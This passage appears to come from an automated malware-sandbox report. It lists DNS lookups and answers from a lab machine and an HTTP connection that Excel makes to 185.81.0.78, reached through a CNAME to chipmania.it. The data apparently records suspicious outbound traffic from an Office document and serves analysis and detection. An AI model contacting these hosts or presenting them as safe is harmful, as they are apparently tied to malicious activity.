Feb 20, 2021 09:48:07.978209019 CET | 192.168.2.22 | 8.8.8.8 | 0xb648 | Standard query (0) | | A (IP address) | IN (0x0001) |
Feb 20, 2021 09:49:07.491444111 CET | 192.168.2.22 | 8.8.8.8 | 0xa0c2 | Standard query (0) | | A (IP address) | IN (0x0001) |
Feb 20, 2021 09:49:07.557696104 CET | 192.168.2.22 | 8.8.8.8 | 0xfa16 | Standard query (0) | | A (IP address) | IN (0x0001) |
Feb 20, 2021 09:49:11.780280113 CET | 192.168.2.22 | 8.8.8.8 | 0x1d23 | Standard query (0) | | A (IP address) | IN (0x0001) |
Feb 20, 2021 09:49:11.849558115 CET | 192.168.2.22 | 8.8.8.8 | 0xc63d | Standard query (0) | | A (IP address) | IN (0x0001) |
Feb 20, 2021 09:49:11.916096926 CET | 192.168.2.22 | 8.8.8.8 | 0xea66 | Standard query (0) | | A (IP address) | IN (0x0001) |
Feb 20, 2021 09:49:12.078605890 CET | 192.168.2.22 | 8.8.8.8 | 0x87a5 | Standard query (0) | | A (IP address) | IN (0x0001) |
Feb 20, 2021 09:49:12.141418934 CET | 192.168.2.22 | 8.8.8.8 | 0x376d | Standard query (0) | | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Feb 20, 2021 09:48:08.037940979 CET | 8.8.8.8 | 192.168.2.22 | 0xb648 | No error (0) | | chipmania.it | | CNAME (Canonical name) | IN (0x0001) |
Feb 20, 2021 09:48:08.037940979 CET | 8.8.8.8 | 192.168.2.22 | 0xb648 | No error (0) | | | 185.81.0.78 | A (IP address) | IN (0x0001) |
Feb 20, 2021 09:49:07.551477909 CET | 8.8.8.8 | 192.168.2.22 | 0xa0c2 | No error (0) | | | 176.58.123.25 | A (IP address) | IN (0x0001) |
Feb 20, 2021 09:49:07.618220091 CET | 8.8.8.8 | 192.168.2.22 | 0xfa16 | No error (0) | | | 176.58.123.25 | A (IP address) | IN (0x0001) |
Feb 20, 2021 09:49:11.846560955 CET | 8.8.8.8 | 192.168.2.22 | 0x1d23 | Name error (3) | | none | none | A (IP address) | IN (0x0001) |
Feb 20, 2021 09:49:11.912435055 CET | 8.8.8.8 | 192.168.2.22 | 0xc63d | Name error (3) | | none | none | A (IP address) | IN (0x0001) |
Feb 20, 2021 09:49:12.074311018 CET | 8.8.8.8 | 192.168.2.22 | 0xea66 | Name error (3) | | none | none | A (IP address) | IN (0x0001) |
Feb 20, 2021 09:49:12.137561083 CET | 8.8.8.8 | 192.168.2.22 | 0x87a5 | Name error (3) | | none | none | A (IP address) | IN (0x0001) |
Feb 20, 2021 09:49:12.232424974 CET | 8.8.8.8 | 192.168.2.22 | 0x376d | Name error (3) | | none | none | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 185.81.0.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 20, 2021 09:48:08.114717007 CET | 0 | OUT | |
Feb 20, 2021 09:48:08.181039095 CET | 2 | IN | |